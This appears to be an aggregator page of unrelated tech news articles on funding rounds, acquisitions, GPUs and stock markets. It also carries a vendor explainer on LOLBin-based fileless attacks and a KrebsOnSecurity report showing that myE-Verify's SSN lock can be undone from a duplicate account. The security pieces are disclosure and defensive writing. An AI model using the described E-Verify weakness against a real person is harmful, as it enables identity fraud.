Google launches the Open Usage Commons, a new organization for managing open-source trademarks

/0 Comments/in /by

Google, in collaboration with a number of academic leaders and its consulting partner SADA Systems, today announced the launch of the Open Usage Commons, a new organization that aims to help open-source projects manage their trademarks.

To be fair, at first glance, open-source trademarks may not sound like it would be a major problem (or even a really interesting topic), but there’s more here than meets the eye. As Google’s director of open source Chris DiBona told me, trademarks have increasingly become an issue for open-source projects, not necessarily because there have been legal issues around them, but because commercial entities that want to use the logo or name of an open-source project on their websites, for example, don’t have the reassurance that they are free to use those trademarks.

“One of the things that’s been rearing its ugly head over the last couple years has been trademarks,” he told me. “There’s not a lot of trademarks in open-source software in general, but particularly at Google, and frankly the higher tier, the more popular open-source projects, you see them more and more over the last five years. If you look at open-source licensing, they don’t treat trademarks at all the way they do copyright and patents, even Apache, which is my favorite license, they basically say, nope, not touching it, not our problem, you go talk.”

Traditionally, open-source licenses didn’t cover trademarks because there simply weren’t a lot of trademarks in the ecosystem to worry about. One of the exceptions here was Linux, a trademark that is now managed by the Linux Mark Institute on behalf of Linus Torvalds.

With that, commercial companies aren’t sure how to handle this situation and developers also don’t know how to respond to these companies when they ask them questions about their trademarks.

“What we wanted to do is give guidance around how you can share trademarks in the same way that you would share patents and copyright in an open-source license […],” DiBona explained. “And the idea is to basically provide that guidance, you know, provide that trademarks file, if you will, that you include in your source code.”

Google itself is putting three of its own open-source trademarks into this new organization: the Angular web application framework for mobile, the Gerrit code review tool and the Istio service mesh. “All three of them are kind of perfect for this sort of experiment because they’re under active development at Google, they have a trademark associated with them, they have logos and, in some cases, a mascot.”

One of those mascots is Diffi, the Kung Fu Code Review Cuckoo, because, as DiBona noted, “we were trying to come up with literally the worst mascot we could possibly come up with.” It’s now up to the Open Usage Commons to manage that trademark.

DiBona also noted that all three projects have third parties shipping products based on these projects (think Gerrit as a service).

Another thing DiBona stressed is that this is an independent organization. Besides himself, Jen Phillips, a senior engineering manager for open source at Google is also on the board. But the team also brought in SADA’s CTO Miles Ward (who was previously at Google); Allison Randal, the architect of the Parrot virtual machine and member of the board of directors of the Perl Foundation and OpenStack Foundation, among others; Charles Lee Isbell Jr., the dean of the Georgia Institute of Technology College of Computing, and Cliff Lampe, a professor at the School of Information at the University of Michigan and a “rising star,” as DiBona pointed out.

“These are people who really have the best interests of computer science at heart, which is why we’re doing this,” DiBona noted. “Because the thing about open source — people talk about it all the time in the context of business and all the rest. The reason I got into it is because through open source we could work with other people in this sort of fertile middle space and sort of know what the deal was.”

Update: even though Google argues that the Open Usage Commons are complementary to other open source organizations, the Cloud Native Computing Foundation (CNCF) released the following statement by Chris Aniszczyk, the CNCF’s CTO: “Our community members are perplexed that Google has chosen to not contribute the Istio project to the Cloud Native Computing Foundation (CNCF), but we are happy to help guide them to resubmit their old project proposal from 2017 at any time. In the end, our community remains focused on building and supporting our service mesh projects like Envoy, linkerd and interoperability efforts like the Service Mesh Interface (SMI). The CNCF will continue to be the center of gravity of cloud native and service mesh collaboration and innovation.”

 

Slack snags corporate directory startup Rimeto to up its people search game

/0 Comments/in /by

For the second time in less than 24 hours, an enterprise company bought an early-stage startup. Yesterday afternoon DocuSign acquired Liveoak, and this morning Slack announced it was buying corporate directory startup Rimeto, which should help employees find people inside the organization who match a specific set of criteria from inside Slack.

The companies did not share the purchase price.

Rimeto helps companies build directories to find employees beyond using tools like Microsoft Active Directory, homegrown tools or your corporate email program. When we covered the company’s $10 million Series A last year, we described what it brings to directories this way:

Rimeto has developed a richer directory by sitting between various corporate systems like HR, CRM and other tools that contain additional details about the employee. It of course includes a name, title, email and phone like the basic corporate system, but it goes beyond that to find areas of expertise, projects the person is working on and other details that can help you find the right person when you’re searching the directory.

In the build versus buy equation that companies balance all the time, it looks like Slack weighed the pros and cons and decided to buy. You could see how a tool like this would be useful to Slack as people try to build teams of employees, especially in a world where so many are working from home.

While the current Slack people search tool lets you search by name, role or team, Rimeto should give users a much more robust way of searching for employees across the company. You can search for the right person to help you with a particular problem and get much more granular with your search requirements than the current tool allows.

Image Credit: Rimeto

At the time of its funding announcement, the company, which was founded in 2016 by three former Facebook employees, told TechCrunch it had bootstrapped for the first three years before taking the $10 million investment last year. It also reported it was cash-flow positive at the time, which is pretty unusual for an early-stage enterprise SaaS company.

In a company blog post announcing the deal, as is typical in these deals, the founders saw being part of a larger organization as a way to grow more quickly than they could have alone. “Joining Slack is a special opportunity to accelerate Rimeto’s mission and impact with greater reach, expanded resources, and the support of Slack’s impressive global team,” the founders wrote in the post.

The acquisition is part of a continuing trend around enterprise companies buying early-stage startups to fill in holes in their product road maps.

Rimeto lands $10M Series A to modernize the corporate directory

PQShield raises $7M for quantum-ready cryptographic security solutions

/0 Comments/in /by

A deep tech startup building cryptographic solutions to secure hardware, software, and communications systems for a future when quantum computers may render many current cybersecurity approaches useless is today emerging out of stealth mode with $7 million in funding and a mission to make cryptographic security something that cannot be hackable, even with the most sophisticated systems, by building systems today that will continue to be usable in a post-quantum future.

PQShield (PQ being short for “post-quantum”), a spin out from Oxford University, is being backed in a seed round led by Kindred Capital, with participation also Crane Venture Partners, Oxford Sciences Innovation and various angel investors, including Andre Crawford-Brunt, Deutsche Bank’s former global head of equities.

PQShield was founded in 2018, and its time in stealth has not been in vain.

The startup claims to have the UK’s highest concentration of cryptography PhDs outside academia and classified agencies, and it is one of the biggest contributors to the NIST cybersecurity framework (alongside academic institutions and huge tech companies), which is working on creating new cryptographic standards, which take into account the fact that quantum computing will likely make quick work of breaking down the standards that are currently in place.

“The scale is massive,” Dr Ali El Kaafarani, a research fellow at Oxford’s Mathematical Institute and former engineer at Hewlett-Packard Labs, who is the founder and CEO of PQShield said of that project. “For the first time we are changing the whole of public key infrastructure.”

And according to El Kaafarani, the startup has customers — companies that build hardware and software services, or run communications systems that deal with sensitive information and run the biggest risks from being hacked.

They include entities in the financial and government sectors that it’s not naming, as well as its first OEM customer, Bosch. El Kaafarani said in an interview that it is also in talks with at least one major communications and messaging provider exploring more security for end-to-end encryption on messaging networks. Other target applications could include keyless cars, connected IoT devices, and cloud services.

The gap in the market the PQShield is aiming to address is the fact that while there are already a number of companies exploring the cutting edge of cryptographic security in the market — they include large tech companies like Amazon and MicrosoftHub Security, Duality, another startup out of the UK focused on post-quantum cryptography called Post Quantum and a number of others — the concern is that quantum computing will be utilised to crack even the most sophisticated cryptography such as the RSA and Elliptic Curve cryptographic standards.

This has not been much of a threat so far since quantum computers are still not widely available and used, but there have been a number of signs of a breakthrough on the horizon.

El Kaafarani says that PQShield is the first startup to approach that predicament with a multi-pronged solution aimed at a variety of use cases, including solutions that encompass current cryptographic standards and provide a migration path the next generation of how they will look — meaning, they can be commercially deployed today, even without quantum computers being a commercial reality, but in preparation for that.

“Whatever we encrypt now can be harvested, and once we have a fully functioning quantum computer people can use that to get back to the data and the sensitive information,” he said.

For hardware applications, it’s designed a System on Chip (SoC) solution that will be licensed to hardware manufacturers (Bosch being the first OEM). For software applications, there is an SDK that secures messaging and is protected by “post-quantum algorithms” based on a secure, Signal-derived protocol.

Thinking about and building for the full spectrum of applications is central to PQShield’s approach, he added. “In security it’s important to understand the whole ecosystem since everything is about connected components.”

Some sectors in the tech world have been especially negatively impacted by the coronavirus and its consequences, a predicament that has been exacerbated by uncertainties over the future of the global economy.

I asked El Kaafarani if that translated to a particularly tricky time to raise money as a deep tech startup, given that deep tech companies so often work on long-term problems that may not have immediate commercial outcomes.

Interestingly, he said that wasn’t the case.

“We talked to VCs that were interested in deep tech to begin with, which made the discussion a lot easier,” he said. “And the fact is that we’re a security company, and that is one of the areas that is doing well. Everything has become digitised, and we have all become more heavily reliant on our digital connections. We ultimately help make the digital world more secure. There are people who understand that, and so it wasn’t too difficult to talk to them and understand the importance of this company.”

Indeed, Chrysanthos Chrysanthou, partner at Kindred Capital, echoed that sentiment:

“With some of the brightest minds in cryptography, mathematics and engineering, and boasting world-class software and hardware solutions, PQShield is uniquely positioned to lead the charge in protecting businesses from one of the most profound threats to their future,” he said. “We couldn’t be happier to support the team as it works to set a new standard for information security and defuse risks resulting from the rise of quantum.”

Tech shares set fresh records despite uncertain economy

/0 Comments/in /by

Despite record-setting COVID-19 infections, American equities rose today. All major indices gained ground during regular trading, while tech stocks did even better.

The Nasdaq Composite set new 52-week and all-time highs, touching 10,462.0 points before closing at 10,433.65, up 2.21% on the day. Similarly, a basket of SaaS and cloud companies that has risen and fallen more sharply than even the tech-heavy Nasdaq closed this afternoon at 1,908.30 after touching 1,952.39 points. Both results were 52-week and all-time highs.

Such is the mood on Wall Street regarding the health of technology companies. It’s not hard to find bullish sentiment, jockeying to push tech shares higher. Some examples of today’s enthusiasm paint the picture:

  • The recent IPO for Lemonade is now worth $4.7 billion, according to Yahoo Finance. That price gives it a Q1-annualized revenue run rate multiple of around 45x. For a SaaS company, that would boggle the mind. As we’ve written, however, Lemonade has very un-SaaS-like gross margins, and has higher churn. The company’s stock rose around 17% today for no clear reason.
  • Tesla rose over 13% today to $1,371.58 per share, another huge day of gains for the company now worth in excess of $250 billion. Analysts expect the firm to report $4.83 billion in revenue in its most recent quarter, according to Yahoo Finance. That’s less than the company reported in its year-ago June quarter when it saw $6.35 billion in revenue. Since July 1, 2019, Tesla shares have appreciated in excess of 450%, despite the company prepping to report what the market anticipates will be revenue declines.
  • Amazon and Netflix also set new records today to toss a few more names into the mix.

You can’t swing your arms without running into a reason why it makes sense for SaaS stocks to be trading at record valuation multiples, or why one company or another is actually reasonably valued over a long-enough time horizon.

It’s worth noting that this putatively rational public investor thinking doesn’t fit at all with what the tech set used to pound into my head about the public markets, namely that they are infamously impatient and thus utter bilge for most long-term value creation. Going public was garbage, I was told; you have to report every three months and no one looks out a few years.

Now, I’m being told by roughly the same people that the market is doing the very thing that they said it didn’t do, namely price firms for future results instead of trailing outcomes. Fine by me either way, frankly, but I’d like to know which story is true.

Happily, we’re about to see if all this high-fiving and enthusiasm is real.

Earnings season beckons, and it should bring with it a dose or two of clarity. If the digital transformation has managed to accelerate sufficiently that most tech companies have managed to greatly boost their near-term value, hats off to the cohort and bully for the startups that must also be enjoying similar revenue upswells.

But that doesn’t have to happen. There are possible earnings result sets that can cause investors to dump tech shares, as Slack learned a month ago.

The background to all of this is that there are good reasons to have some doubts about the current health of the national economy. And, sure, most people are willing to allow that the stock market and the aggregate domestic economy are not perfectly linked — this is no less than partially true — but each day the stock market steps higher and COVID-19 surges again leading to re-closings around the nation makes you to wonder if this is all for real.

Earnings season is here soon. Let’s find out.

Nayya, bringing transparency to choosing and managing healthcare plans, raises $2.7 million

/0 Comments/in /by

Entrepreneurs Roundtable Accelerator -backed Nayya is on a mission to simplify choosing and managing employee benefits through machine learning and data transparency.

The company has raised $2.7 million in seed funding led by Social Leverage, with participation from Guardian Strategic Ventures, Cameron Ventures, Soma Capital, as well as other strategic angels.

The process of choosing an employer-provided healthcare plan and understanding that plan can be tedious at best and incredibly confusing at worst. And that doesn’t even include all of the supplemental plans and benefits associated with these programs.

Co-founded by Sina Chehrazi and Akash Magoon, Nayya tries to solve this problem. When enrollment starts, employers send out an email that includes a link to Nayya’s Companion, the company’s flagship product.

Companion helps employees find the plan that is right for them. The software first asks a series of questions about lifestyle, location, etc. For example, Nayya co-founder and CEO Chehrazi explained that people who bike to work, as opposed to driving in a car, walking or taking public transportation, are 20 times more likely to get into an accident and need emergency services.

Companion asks questions in this vein, as well as questions around whether you take medication regularly or if you expect your healthcare costs to go up or down over the next year, without getting into the specifics of chronic ailments or diseases or particular issues.

Taking that data into account, Nayya then looks at the various plans provided by the employer to show you which one matches the user’s particular lifestyle and budget best.

Nayya doesn’t just pull information directly from the insurance company directory listings, as nearly 40% of those listings have at least one error or are out of date. It pulls from a broad variety of data sources, including the Centers for Medicare and Medicaid Services (CMS), to get the cleanest, most precise data around which doctors are in network and the usual costs associated with visiting those doctors.

Alongside Companion, Nayya also provides a product called “Edison,” which it has dubbed the Alexa for Helathcare. Users can ask Edison questions like “What is my deductible?” or “Is Dr. So-and-So in my network and what would it cost to go see her?”

The company helps individual users find the right provider for them with the ability to compare costs, location and other factors involved. Nayya even puts a badge on listings for providers where another employee at the company has gone and had a great experience, giving another layer of validation to that choice.

As the healthtech industry looks to provide easier-to-use healthcare and insurance, the idea of “personalization” has been left behind in many respects. Nayya focuses first and foremost on the end-user and aims to ensure that their own personal healthcare journey is as simple and straightforward as possible, believing that the other pieces of the puzzle will fall into place when the customer is taken care of.

Nayya plans on using the funding to expand the team across engineering, data science, product management and marketing, as well as doubling down on the amount of data the company is purchasing, ingesting and cleaning.

Alongside charging employers on a per seat, per month basis, Nayya is also looking to start going straight to insurance companies with its product.

“The greatest challenge is educating an entire ecosystem and convincing that ecosystem to believe that where the consumer wins, everyone wins,” said Chehrazi. “How to finance and understand your healthcare has never been more important than it is right now, and there is a huge need to provide that education in a data driven way to people. That’s where I want to spend the next I don’t know how many years of my life to drive that change.”

Nayya has five full-time employees currently and 80% of the team comes from racially diverse backgrounds.

OwnBackup lands $50M as backup for Salesforce ecosystem thrives

/0 Comments/in /by

OwnBackup has made a name for itself primarily as a backup and disaster recovery system for the Salesforce ecosystem, and today the company announced a $50 million investment.

Insight Partners led the round, with participation from Salesforce Ventures and Vertex Ventures. This chunk of money comes on top of a $23 million round from a year ago, and brings the total raised to more than $100 million, according to the company.

It shouldn’t come as a surprise that Salesforce Ventures chipped in when the majority of the company’s backup and recovery business involves the Salesforce ecosystem, although the company will be looking to expand beyond that with the new money.

“We’ve seen such growth over the last two and a half years around the Salesforce ecosystem, and the other ISV partners like Veeva and nCino that we’ve remained focused within the Salesforce space. But with this funding, we will expand over the next 12 months into a few new ecosystems,” company CEO Sam Gutmann told TechCrunch.

In spite of the pandemic, the company continues to grow, adding 250 new customers last quarter, bringing it to over 2,000 customers and 250 employees, according to Gutmann.

He says that raising the round, which closed at the beginning of May, had some hairy moments as the pandemic began to take hold across the world and worsen in the U.S. For a time, he began talking to new investors in case his existing ones got cold feet. As it turned out, when the quarterly numbers came in strong, the existing ones came back and the round was oversubscribed, Gutmann said.

“Q2 frankly was a record quarter for us, adding over 250 new accounts, and we’re seeing companies start to really understand how critical this is,” he said.

The company plans to continue hiring through the pandemic, although he says it might not be quite as aggressively as they once thought. Like many companies, even though they plan to hire, they are continually assessing the market. At this point, he foresees growing the workforce by about another 50 people this year, but that’s about as far as he can look ahead right now.

Gutmann says he is working with his management team to make sure he has a diverse workforce right up to the executive level, but he says it’s challenging. “I think our lower ranks are actually quite diverse, but as you get up into the leadership team, you can see on the website unfortunately we’re not there yet,” he said.

They are instructing their recruiting teams to look for diverse candidates whether by gender or ethnicity, and employees have formed a diversity and inclusion task force with internal training, particularly for managers around interviewing techniques.

He says going remote has been difficult, and he misses seeing his employees in the office. He hopes to have at least some come back before the end of the summer and slowly add more as we get into the fall, but that will depend on how things go.

OwnBackup grabs $7.5M Series B investment for SaaS data backup service

Zoom announces new Hardware as a Service offering to run on ServiceNow

/0 Comments/in /by

Zoom announced a new Hardware as a Service offering today that will run on the ServiceNow platform. At the same time, the company announced a deal with ServiceNow to standardize on Zoom and Zoom Phone for its 11,000 employees in another case of SaaS cooperation.

For starters, the new Hardware as a Service offering allows customers, who use the Zoom Phone and Zoom Rooms software, to acquire related hardware from the company for a fixed monthly cost. The company announced that initial solutions providers will include DTEN, Neat, Poly and Yealink.

The new service allows companies to access low-cost hardware and pay for the software and hardware on a single invoice. This could result in lower up-front costs, while simplifying the bookkeeping associated with a customer’s online communications options.

Companies can start small if they wish, then add additional hardware over time as needs change, and they can also opt for a fully managed service, where a third party can deal with installation and management of the hardware if that’s what a customer requires.

Zoom will run the new service on ServiceNow’s Now platform, which provides a way to manage the service requests as they come in. And in a case of one SaaS hand washing the other, ServiceNow has standardized on the Zoom platform for its internal communications tool, which has become increasingly important as the pandemic has moved employees to work from home. The company also plans to replace its current phone system with Zoom Phones.

One of the defining characteristics of SaaS companies, and a major difference from previous generations of tech companies, has been the willingness of these organizations to work together to string together sets of services when it makes sense. These kinds of partnerships not only benefit the companies involved, they tend to be a win for customers too.

Brent Leary, founder at CRM Essentials, sees this as a deal between two rising SaaS stars, and one that benefits both companies. “Everyone and their mother is announcing partnerships with Zoom, focusing on integrating video communications into core focus areas. But this partnership looks to be much more substantial than most, with ServiceNow not only partnering with Zoom for tighter video communication capabilities, but also displacing its current phone system with Zoom Phone,” Leary told TechCrunch.

ServiceNow pledges no layoffs in 2020

Nvidia’s Ampere GPUs come to Google Cloud

/0 Comments/in /by

Nvidia today announced that its new Ampere-based data center GPUs, the A100 Tensor Core GPUs, are now available in alpha on Google Cloud. As the name implies, these GPUs were designed for AI workloads, as well as data analytics and high-performance computing solutions.

The A100 promises a significant performance improvement over previous generations. Nvidia says the A100 can boost training and inference performance by over 20x compared to its predecessors (though you’ll mostly see 6x or 7x improvements in most benchmarks) and tops out at about 19.5 TFLOPs in single-precision performance and 156 TFLOPs for Tensor Float 32 workloads.

Image Credits: Nvidia

“Google Cloud customers often look to us to provide the latest hardware and software services to help them drive innovation on AI and scientific computing workloads,” said Manish Sainani, Director of Product Management at Google Cloud, in today’s announcement. “With our new A2 VM family, we are proud to be the first major cloud provider to market Nvidia A100 GPUs, just as we were with Nvidia’s T4 GPUs. We are excited to see what our customers will do with these new capabilities.”

Google Cloud users can get access to instances with up to 16 of these A100 GPUs, for a total of 640GB of GPU memory and 1.3TB of system memory.

How Do Attackers Use LOLBins In Fileless Attacks?

/0 Comments/in /by

For malware authors, the idea of exploiting existing software on a user’s machine to achieve malicious purposes has a lot of attractions. For one, it means less work for them in developing custom malware. For another, it means less chance of being detected. After all, if you can hijack an existing and trusted piece of software to achieve your ends, the chances are better that you’ll go undetected. This technique, known as “Living off the Land”, has a long history, but it’s not getting old.

New “Living off the Land” binaries, or LOLBins, can appear with any software or OS update, or may have been lying around with undocumented abilities for some time: researchers at SentinelLabs just disclosed a previously unknown LOLBin, for example. In this post, we dig into what LOLBins are, why they are a concern, and most importantly how you can detect their malicious use.

What is a LOLBin?

Any executable that comes installed as part of your operating system by default that can be used to further an attack can be considered a LOLBin. In addition, executables added by users for legitimate purposes could be exploited as a LOLBin, particularly if it is part of some common or widely used 3rd party software installation.

The key to understanding what a LOLBin is revolves less around its origin and more around whether the executable is found on the system prior to the malware attack.

In such cases, that executable is likely to be treated without suspicion by both users and admins and potentially even whitelisted as benign by some security tools.

In targeted attacks, an actor may first surveil a system for LOLBins unique to the victim’s environment, but typically attackers are interested in efficiency and prefer to write malware that will make use of commonly-found executables, such as scripting engines like bash and PowerShell as well as utilities like msiexec, psxec and desktopimgdownldr, which have unexpected or little-known capabilities useful to threat actors. On macOS, osascript is a LOLBin widely exploited by attackers for executing malicious AppleScripts.

Aside from being potentially ignored by both users and security tools, LOLBins like those just mentioned can allow malicious actors to communicate with remote servers and blend in with typical network activity. Other LOLBins may help attackers to perform functions such as compile code, achieve persistence, dump processes and hijack DLLs.

How Do Attackers Use LOLBins In Fileless Attacks?

Fileless attacks have been increasing in recent years, although there is some misunderstanding about exactly what makes an attack ‘fileless’. Such attacks may still be initiated through documents (like email attachments) and they may leave behind files (like persistence agents), but what makes them fileless is that the code is executed in-memory.

The main idea behind a fileless attack is that code execution occurs in-memory rather than by spawning a process that executes compiled code from a source file.

This means that the attack cannot be detected just by scanning a system for malicious binaries or executable files. In addition, once memory has been purged (such as by a reboot) there may be little or no evidence of the attack for incident responders and threat hunters to detect.

A typical scenario for a fileless attack might begin with a phishing attempt, in which the target is socially-engineered to click on a malicious link or attachment. This may execute JavaScript or VBScript or call a LOLBin like PowerShell to download and execute malicious code in-memory.

This second-stage payload may go on to use other LOLBins like WMI (Windows Management Instrumentation) to execute code to do things like achieve persistence, open a backdoor or contact a C2 server to exfiltrate data. Fileless attacks may be combined with other threats such as ransomware and keyloggers.

What Are Some Examples of Fileless Attacks Using LOLBins?

Fileless attacks using LOLBins are quite common and have been documented on Windows, Linux and Mac platforms. Indeed, insofar as the attack can hijack native tools that either exist on all platforms or have equivalents, these kinds of attacks can be platform-agnostic. APT group Lazarus, for example, has been observed distributing MS Word documents that will execute an in-memory attack using LOLBins regardless of whether the attachment is opened on Windows or a Mac.

image of visual basic sub autorun

Among some of the more high-profile attacks that have leveraged LOLBins and a fileless attack vector were those on the DNC (Democratic National Committee) in the previous US election year and the attack on Equifax in 2017 that resulted in billion dollar losses for the company and the exposure of records belonging to nearly 150 million people.

Why Do Security Researchers Worry About LOLBins?

As we have seen, LOLBins present a problem because they are a legitimate part of the environment that can be coerced to do the threat actors‘ work for them. Of course, some LOLBins like PowerShell are well-known and can be monitored and/or locked down to prevent abuse.

However, keeping an inventory of the functionality of every legitimate executable on the system and whether it could be leveraged for malicious purposes isn’t really practical. Not only do operating systems contain a vast amount of built-in binaries that are being added to or updated with new functionality all the time, there is also a massive amount of widely-used 3rd party software in the enterprise environment whose full functionality may not be documented.

As a result, security practitioners are continually engaged in research to unearth new or undiscovered LOLBins before attackers do.

But even when discovered, there remains the problem of how to deal with the use of that legitimate tool to ensure it is being used only for its intended purpose.

How Can You Detect the Malicious Use of LOLBins?

With no recognizable file signature and ever-revolving C2 IP addresses, security teams can be engaged in a wearying game of whackamole trying to chase stealthy attacks that their current tools are not equipped to handle.

In many scenarios, it is simply not effective to block LOLBins that may be essential to the productivity of some of the teams in your organization.

The key to defeating attacks leveraging LOLBins lies in a behavioral AI engine that can detect malicious behavior based on what code does, rather than where it comes from. Rather than inspecting files to see if they contain malicious code, a behavioral AI engine looks at activity on the endpoint and distinguishes between malicious and benign activity.

Using contextual information, the agent can not only recognize that some activity is malicious, but can also distinguish the source of the malicious activity without laying the blame at the door of the native tool invoked by the malicious process.

Conclusion

Stealth is one of every threat actor’s primary objectives, and natively existing binaries, LOLBins, provide perfect camouflage for malware that wants to hide in plain sight. While it’s vital that we continue to research the capabilities in our environment, the task of detecting malicious processes on execution regardless of their source is one that readily lends itself to an automated, machine learning algorithm. If you would like to see how SentinelOne can help protect your organization against all kinds of threat actors, contact us for a free demo.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

E-Verify’s “SSN Lock” is Nothing of the Sort

/0 Comments/in /by

One of the most-read advice columns on this site is a 2018 piece called “Plant Your Flag, Mark Your Territory,” which tried to impress upon readers the importance of creating accounts at websites like those at the Social Security Administration, the IRS and others before crooks do it for you. A key concept here is that these services only allow one account per Social Security number — which for better or worse is the de facto national identifier in the United States. But KrebsOnSecurity recently discovered that this is not the case with all federal government sites built to help you manage your identity online.

A reader who was recently the victim of unemployment insurance fraud said he was told he should create an account at the Department of Homeland Security‘s myE-Verify website, and place a lock on his Social Security number (SSN) to minimize the chances that ID thieves might abuse his identity for employment fraud in the future.

DHS’s myE-Verify homepage.

According to the website, roughly 600,000 employers at over 1.9 million hiring sites use E-Verify to confirm the employment eligibility of new employees. E-Verify’s consumer-facing portal myE-Verify lets users track and manage employment inquiries made through the E-Verify system. It also features a “Self Lock” designed to prevent the misuse of one’s SSN in E-Verify.

Enabling this lock is supposed to mean that for the next year thereafter, if an unauthorized individual attempts to fraudulently use a SSN for employment authorization, he or she cannot use the SSN in E-Verify, even if the SSN is that of an employment authorized individual. But in practice, this service may actually do little to deter ID thieves from impersonating you to a potential employer.

At the request of the reader who reached out (and in the interest of following my own advice to plant one’s flag), KrebsOnSecurity decided to sign up for a myE-Verify account. After verifying my email address, I was asked to pick a strong password and select a form of multi-factor authentication (MFA). The most secure MFA option offered (a one-time code generated by an app like Google Authenticator or Authy) was already pre-selected, so I chose that.

The site requested my name, address, SSN, date of birth and phone number. I was then asked to select five questions and answers that might be asked if I were to try to reset my password, such as “In what city/town did you meet your spouse,” and “What is the name of the company of your first paid job.” I chose long, gibberish answers that had nothing to do with the questions (yes, these password questions are next to useless for security and frequently are the cause of account takeovers, but we’ll get to that in a minute).

Password reset questions selected, the site proceeded to ask four, multiple-guess “knowledge-based authentication” questions to verify my identity. The U.S. Federal Trade Commission‘s primer page on preventing job-related ID theft says people who have placed a security freeze on their credit files with the major credit bureaus will need to lift or thaw the freeze before being able to answer these questions successfully at myE-Verify. However, I did not find that to be the case, even though my credit file has been frozen with the major bureaus for years.

After successfully answering the KBA questions (the answer to each was “none of the above,” by the way), the site declared I’d successfully created my account! I could then see that I had the option to place a “Self Lock” on my SSN within the E-Verify system.

Doing so required me to pick three more challenge questions and answers. The site didn’t explain why it was asking me to do this, but I assumed it would prompt me for the answers in the event that I later chose to unlock my SSN within E-Verify.

After selecting and answering those questions and clicking the “Lock my SSN” button, the site generated an error message saying something went wrong and it couldn’t proceed.

Alas, logging out and logging back in again showed that the site did in fact proceed and that my SSN was locked. Joy.

But I still had to know one thing: Could someone else come along pretending to be me and create another account using my SSN, date of birth and address but under a different email address? Using a different browser and Internet address, I proceeded to find out.

Imagine my surprise when I was able to create a separate account as me with just a different email address (once again, the correct answers to all of the KBA questions was “none of the above”). Upon logging in, I noticed my SSN was indeed locked within E-Verify. So I chose to unlock it.

Did the system ask any of the challenge questions it had me create previously? Nope. It just reported that my SSN was now unlocked. Logging out and logging back in to the original account I created (again under a different IP and browser) confirmed that my SSN was unlocked.

ANALYSIS

Obviously, if the E-Verify system allows multiple accounts to be created using the same name, address, phone number, SSN and date of birth, this is less than ideal and somewhat defeats the purpose of creating one for the purposes of protecting one’s identity from misuse.

Lest you think your SSN and DOB is somehow private information, you should know this static data about U.S. residents has been exposed many times over in countless data breaches, and in any case these digits are available for sale on most Americans via Dark Web sites for roughly the bitcoin equivalent of a fancy caffeinated drink at Starbucks.

Being unable to proceed through knowledge-based authentication questions without first unfreezing one’s credit file with one or all of the big three credit bureaus (Equifax, Experian and TransUnion) can actually be a plus for those of us who are paranoid about identity theft. I couldn’t find any mention on the E-Verify site of which company or service it uses to ask these questions, but the fact that the site doesn’t seem to care whether one has a freeze in place is troubling.

And when the correct answer to all of the KBA questions that do get asked is invariably “none of the above,” that somewhat lessens the value of asking them in the first place. Maybe that was just the luck of the draw in my case, but also troubling nonetheless. Either way, these KBA questions are notoriously weak security because the answers to them often are pulled from records that are public anyway, and can sometimes be deduced by studying the information available on a target’s social media profiles.

Speaking of silly questions, relying on “secret questions” or “challenge questions” as an alternative method of resetting one’s password is severely outdated and insecure. A 2015 study by Google titled “Secrets, Lies and Account Recovery” (PDF) found that secret questions generally offer a security level that is far lower than just user-chosen passwords. Also, the idea that an account protected by multi-factor authentication could be undermined by successfully guessing the answer(s) to one or more secret questions (answered truthfully and perhaps located by thieves through mining one’s social media accounts) is bothersome.

Finally, the advice given to the reader whose inquiry originally prompted me to sign up at myE-Verify doesn’t seem to have anything to do with preventing ID thieves from fraudulently claiming unemployment insurance benefits in one’s name at the state level. KrebsOnSecurity followed up with four different readers who left comments on this site about being victims of unemployment fraud recently, and none of them saw any inquiries about this in their myE-Verify accounts after creating them. Not that they should have seen signs of this activity in the E-Verify system; I just wanted to emphasize that one seems to have little to do with the other.